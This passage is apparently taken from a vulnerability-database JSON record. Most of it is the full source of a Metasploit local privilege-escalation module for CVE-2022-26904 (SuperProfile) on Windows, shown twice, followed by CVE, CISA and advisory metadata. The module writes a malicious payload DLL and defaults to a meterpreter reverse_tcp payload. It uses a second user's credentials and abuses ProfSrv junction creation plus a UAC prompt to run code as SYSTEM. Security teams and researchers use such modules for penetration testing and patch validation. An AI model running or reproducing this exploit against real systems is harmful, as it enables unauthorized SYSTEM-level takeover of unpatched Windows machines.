invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-14T15:38:05", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privlege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:40", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows User Profile Service Elevation of Privilege (CVE-2022-21919)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21919"], "modified": "2022-01-11T00:00:00", "id": "CPAI-2022-0003", "href": "", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21919"], "modified": "2022-04-25T00:00:00", "id": "CISA-KEV-CVE-2022-21919", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2021-34484", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:18:43", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21895", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-21895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", 